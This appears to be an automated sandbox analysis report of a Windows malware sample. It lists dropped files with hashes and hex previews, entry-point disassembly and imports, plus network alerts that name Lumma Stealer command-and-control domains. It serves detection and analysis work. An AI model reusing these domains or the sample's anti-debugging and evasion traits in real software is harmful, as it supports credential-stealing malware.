                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):370176
                                                                                                                                                                      Entropy (8bit):7.990824056166435
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
                                                                                                                                                                      MD5:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                      SHA1:37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
                                                                                                                                                                      SHA-256:D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
                                                                                                                                                                      SHA-512:01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j|.M.........M.;.*.q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$|(.gE.N...3.J..*T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1224
                                                                                                                                                                      Entropy (8bit):4.435108676655666
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                      MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                      SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                      SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                      SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4608
                                                                                                                                                                      Entropy (8bit):3.945868784648335
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6/prPtxM7Jt8Bs3FJsdcV4MKe27+KvqBHOOulajfqXSfbNtm:CPwPc+Vx9MlvkocjRzNt
                                                                                                                                                                      MD5:979EA2FAC2E52FBB0B1704B4F75E9468
                                                                                                                                                                      SHA1:F2A5D40B8BEC47D950FF20D42ADDC97DFD9BF883
                                                                                                                                                                      SHA-256:FE02E01915FC099063FE15880A49B85F50906E5EBA8BF51FEB6C890E01D605F7
                                                                                                                                                                      SHA-512:B521488CD44FAB4ACFF2E8C8EE83BC0A4576340C4C9BEDE5D4139DAA73744C7EDCDDE02126C5FC98C0FBAC21DCBB38CB3442FE267FD8756B607F702D063441EE
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                      Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                      Entropy (8bit):2.5600289361122233
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                                                                                                                      MD5:198AA7622D86723F12D39AA38A10C97F
                                                                                                                                                                      SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                                                                                                                      SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                                                                                                                      SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:012340..1..2..3..4.....
                                                                                                                                                                      Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):502
                                                                                                                                                                      Entropy (8bit):4.6048426069826895
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:P9+C5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:cMdUOAokItULVDv
                                                                                                                                                                      MD5:D510E22CA3F4F1945E85960DFC3DFA92
                                                                                                                                                                      SHA1:4552001C0766EC619ACBFF204270C1B6E663A654
                                                                                                                                                                      SHA-256:16BB818463E168FD5E14C909C59EF05007D8CC96233DD350B40D3C6B1BBB6AA2
                                                                                                                                                                      SHA-512:C9F6CC22C836E86EF018D2B9246BDC432A4F3775FA133FE9984A2EE5FE39129D9EA5AA67CE555C24EC6818CDC18B4E508051D0EFCA1CF4357F783AB901F75558
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..Pinging 980108 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.722906589964808
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:seoI30IZZr.exe
                                                                                                                                                                      File size:637'952 bytes
                                                                                                                                                                      MD5:d0e53e2a0bef6c93e0ccad47a650079d
                                                                                                                                                                      SHA1:8e69fc482c058749cc7974e94ad7d571fca6ccf2
                                                                                                                                                                      SHA256:26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34
                                                                                                                                                                      SHA512:4377d1a2e3c3ef2065b445f004cb9e2853bfc12f35e38315013c02b45e0c6059cb1e5d5200875026de358cc91b51b6f2c13ed9fd92b49a10f7d67267e8216f48
                                                                                                                                                                      SSDEEP:12288:RE+F1v/+mon5DpjiNb58UxCj2AqeMQmHnJpaWH:/7/+v5UNb58uGKFHnJpZ
                                                                                                                                                                      TLSH:66D49D5573A54BA4D2B6613894BBA317F737B80817358ADB63D040643FE23E05EBBB12
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................
                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                      Entrypoint:0x14004d28c
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x66F0CB3A [Mon Sep 23 01:58:18 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:11c012ef8b8b753a6c7dfac749804464
                                                                                                                                                                      Instruction
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                      call 00007F2FACDD847Ch
                                                                                                                                                                      dec eax
                                                                                                                                                                      add esp, 28h
                                                                                                                                                                      jmp 00007F2FACDD7DA7h
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp+10h], ebx
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp+18h], esi
                                                                                                                                                                      push ebp
                                                                                                                                                                      push edi
                                                                                                                                                                      inc ecx
                                                                                                                                                                      push esi
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 10h
                                                                                                                                                                      xor eax, eax
                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                      cpuid
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov edx, edx
                                                                                                                                                                      inc ecx
                                                                                                                                                                      xor edx, 49656E69h
                                                                                                                                                                      inc ecx
                                                                                                                                                                      xor eax, 6C65746Eh
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov ecx, ebx
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov esi, eax
                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                      cpuid
                                                                                                                                                                      inc ebp
                                                                                                                                                                      or edx, eax
                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                      inc ecx
                                                                                                                                                                      xor ecx, 756E6547h
                                                                                                                                                                      mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                      inc ebp
                                                                                                                                                                      or edx, ecx
                                                                                                                                                                      mov dword ptr [ebp-08h], ecx
                                                                                                                                                                      mov edi, ecx
                                                                                                                                                                      mov dword ptr [ebp-04h], edx
                                                                                                                                                                      jne 00007F2FACDD7F8Dh
                                                                                                                                                                      dec eax
                                                                                                                                                                      or dword ptr [00030D9Dh], FFFFFFFFh
                                                                                                                                                                      and eax, 0FFF3FF0h
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [00030D85h], 00008000h
                                                                                                                                                                      cmp eax, 000106C0h
                                                                                                                                                                      je 00007F2FACDD7F5Ah
                                                                                                                                                                      cmp eax, 00020660h
                                                                                                                                                                      je 00007F2FACDD7F53h
                                                                                                                                                                      cmp eax, 00020670h
                                                                                                                                                                      je 00007F2FACDD7F4Ch
                                                                                                                                                                      add eax, FFFCF9B0h
                                                                                                                                                                      cmp eax, 20h
                                                                                                                                                                      jnbe 00007F2FACDD7F56h
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov ecx, 00010001h
                                                                                                                                                                      add dword ptr [eax], eax
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      dec eax
                                                                                                                                                                      bt ecx, eax
                                                                                                                                                                      jnc 00007F2FACDD7F46h
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov eax, dword ptr [0004D21Fh]
                                                                                                                                                                      inc ecx
                                                                                                                                                                      or eax, 01h
                                                                                                                                                                      inc esp
                                                                                                                                                                      mov dword ptr [0004D214h], eax
                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7b7dc0x1a4.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x1e8.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x9b0000x2dfc.pdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9f0000x240.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x751c00x70.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x752800x28.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x750800x140.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x500000x850.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x4e4170x4e600488d6825be90b0deec8f95e2517395e0False0.49077639055023925data6.496684323663845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x500000x2dc1c0x2de00c47f95cc9eaf35dc9eff9da1925851c7False0.7468547769073569dBase III DBT, version number 0, next free block index 509838, 1st item "\356\301\007"6.925412149747705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x7e0000x1cca80x1c00049039aff1d6c3a9a98ec08d65b5ceb5bFalse0.4547206333705357data5.381399126314764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .pdata0x9b0000x2dfc0x2e0062b35584c7b99e38dc903e4e4c13756cFalse0.47316576086956524data5.740105168001118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0x9e0000x1e80x20047073ab0f41674365afed1b0d7cc6cd5False0.54296875data4.768131151703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x9f0000x2400x4003951977efcb66bc5bb67c5f34cdd601cFalse0.3974609375data3.6128407531251083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_MANIFEST0x9e0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                      DLLImport
                                                                                                                                                                      d3d9.dllDirect3DCreate9Ex
                                                                                                                                                                      KERNEL32.dllVirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
                                                                                                                                                                      USER32.dllGetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
                                                                                                                                                                      ADVAPI32.dllOpenProcessToken, GetTokenInformation
                                                                                                                                                                      IMM32.dllImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
                                                                                                                                                                      MSVCP140.dll_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
                                                                                                                                                                      ntdll.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                                                                                                                                                      dwmapi.dllDwmExtendFrameIntoClientArea
                                                                                                                                                                      VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                                                                      VCRUNTIME140.dll__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
                                                                                                                                                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
                                                                                                                                                                      api-ms-win-crt-string-l1-1-0.dllstrncpy, isprint, strcmp, _stricmp
                                                                                                                                                                      api-ms-win-crt-utility-l1-1-0.dllqsort, rand
                                                                                                                                                                      api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, _callnewh, free, malloc
                                                                                                                                                                      api-ms-win-crt-convert-l1-1-0.dllatof
                                                                                                                                                                      api-ms-win-crt-runtime-l1-1-0.dllsystem, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
                                                                                                                                                                      api-ms-win-crt-math-l1-1-0.dllatan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
                                                                                                                                                                      api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _lock_file
                                                                                                                                                                      api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, _configthreadlocale
                                                                                                                                                                      SHELL32.dllShellExecuteW
                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States
                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-09-30T18:19:16.762080+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.8550291.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.780192+02002056054ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)1192.168.2.8585401.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.793557+02002056040ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)1192.168.2.8554611.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.808005+02002056056ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)1192.168.2.8535631.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.819790+02002056036ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)1192.168.2.8507411.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.832660+02002056058ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)1192.168.2.8613291.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.845073+02002056046ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)1192.168.2.8557581.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.858485+02002056042ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)1192.168.2.8506701.1.1.153UDP
                                                                                                                                                                      2024-09-30T18:19:16.869633+02002056052ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)1192.168.2.8591611.1.1.153UDP
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Sep 30, 2024 18:19:11.250468016 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:11.250484943 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:11.250560045 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:11.287185907 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:11.287203074 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:11.756845951 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:11.756968975 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:11.761209011 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:11.761220932 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:11.761507034 CEST44349706188.114.96.3192.168.2.8
